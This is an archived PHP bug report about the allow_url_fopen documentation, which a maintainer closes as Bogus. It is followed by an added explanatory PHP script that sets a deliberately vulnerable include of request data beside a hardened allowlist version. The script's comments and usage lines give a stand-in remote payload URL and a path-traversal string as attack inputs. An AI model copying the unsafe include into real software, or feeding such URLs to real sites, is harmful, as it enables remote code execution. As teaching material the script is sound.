#37874 [Opn->Bgs]: allow_url_fopen documentation incomplete
colder@php.net

2006-06-24, 8:03 am

ID: 37874
Updated by: colder@php.net
Reported By: Harry dot Boeck at t-online dot de
-Status: Open
+Status: Bogus
Bug Type: Documentation problem
Operating System: all
PHP Version: Irrelevant
New Comment:

I fail to see where the documentation was not precise enough.
If you read http://php.net/ref.filesystem#ini.allow-url-fopen
or http://php.net/features.remote-files,
it's clearly stated that this directive affects the possibility to use
URL wrappers. Thus, every function allowed to use such wrappers (or
URL-aware) will be affected.

Notice that the configuration directive "allow_url_include" exists
since PHP 6, to address this very "security problem".



Previous Comments:
------------------------------------------------------------------------

[2006-06-21 12:43:21] Harry dot Boeck at t-online dot de

Description:
------------
allow_url_fopen is incompletely documented concerning effects on file
handling:

This option allows usage of arbitrary files NOT only for file functions,
but for every kind of file handling including "include"/"require", circumventing
"include_path" and "doc_root".
This effectively enables the entire internet to execute whatever they
want in the php space on this server. This is a huge security risk.
This is, however, only effective when some possibility to manipulate
any of the mentioned file operations is already present in the php code
(for example, an argument replacement such as "include $somefile").
This in turn is commonly seen not only in open source projects but also,
for example, in Dreamweaver productions.

I have found reports dating from 2004 on the internet, where the risk
is completely documented - but not in the php documentation, where it
should be.

Reproduce code:
---------------
not applicable

Expected result:
----------------
There should be a complete description of the vulnerability at least
either in the configuration file or in the documentation.

Actual result:
--------------
The documentation refers only to the "file system functions" in general,
or to the "fopen" function in particular.

Concerning "require", there is only a hint that inclusion of files was
not possible even with "allow_url_fopen" enabled in earlier versions of
php.


------------------------------------------------------------------------


--
Edit this bug report at http://bugs.php.net/?id=37874&edit=1
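The include pattern the reporter describes above (`include $somefile` with a user-controlled value while allow_url_fopen is on), shown beside a hardened form and a runtime check of the two directives colder@php.net mentions. This is an added example written for this archive page; it is not code from the bug report, from the reporter, or from PHP's own sources. The function names, the `PAGES` map, the `pages/` directory and the `attacker.example` host are assumed for illustration, and the script needs PHP 7.1 or later for its type declarations.

```php
<?php
// Added example (not from the bug report). Run from the PHP CLI, e.g.:
//   php rfi_demo.php home
//   php rfi_demo.php http://attacker.example/payload.txt
//   php rfi_demo.php ../../etc/passwd

// 1. The vulnerable pattern the reporter describes. $page comes straight from
//    the request, and include honours URL wrappers when allow_url_fopen is on
//    (on PHP 5.2 and later, allow_url_include must be on as well), so a value
//    such as http://attacker.example/payload.txt is fetched and executed.
//    include_path and doc_root do not constrain a URL.
function includePageUnsafe(string $page): void
{
    include $page . '.php';   // vulnerable: never do this with request data
}

// 2. Hardened form: user input never reaches include. The request carries an
//    opaque key; the key is mapped to a fixed local path; anything else is refused.
const PAGES = [
    'home'    => 'pages/home.php',    // assumed directory layout
    'about'   => 'pages/about.php',
    'contact' => 'pages/contact.php',
];

function resolvePage(string $page): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;   // unknown key (including any URL or traversal string): refuse
    }
    // realpath() returns false for a missing file; also confirm the resolved
    // file still lives below this directory as defence in depth.
    $path = realpath(__DIR__ . '/' . PAGES[$page]);
    if ($path === false || strpos($path, __DIR__ . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function includePageSafe(string $page): void
{
    $path = resolvePage($page);
    if ($path === null) {
        http_response_code(404);
        echo "unknown page\n";
        return;
    }
    include $path;
}

// 3. Runtime check of the directives. allow_url_include was introduced in
//    PHP 5.2; on older builds ini_get() returns false for it and only
//    allow_url_fopen decides whether include accepts a URL.
//    The corresponding php.ini hardening is:
//        allow_url_fopen = Off
//        allow_url_include = Off
function remoteIncludePossible(): bool
{
    $fopen   = filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN);
    $include = ini_get('allow_url_include');
    if ($include === false) {
        return $fopen;                 // directive absent: pre-5.2 behaviour
    }
    return filter_var($include, FILTER_VALIDATE_BOOLEAN);
}

// --- demo: show the directive state and how the resolver treats the argument ---
$page = $argv[1] ?? 'home';

printf("allow_url_fopen=%s allow_url_include=%s\n",
    var_export(ini_get('allow_url_fopen'), true),
    var_export(ini_get('allow_url_include'), true));

if (remoteIncludePossible()) {
    fwrite(STDERR, "warning: this PHP configuration lets include/require load URLs\n");
}

$resolved = resolvePage($page);
printf("request %s -> %s\n",
    var_export($page, true),
    $resolved === null ? 'REFUSED' : $resolved);
```

The resolver never inspects the input for "http://" or "..": it only asks whether the value is one of a handful of known keys, so the question of which wrappers include will accept does not arise in the application code at all. The directive check is a second layer for deployments where the ini file is not under the application's control.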

Copyright 2008 codecomments.com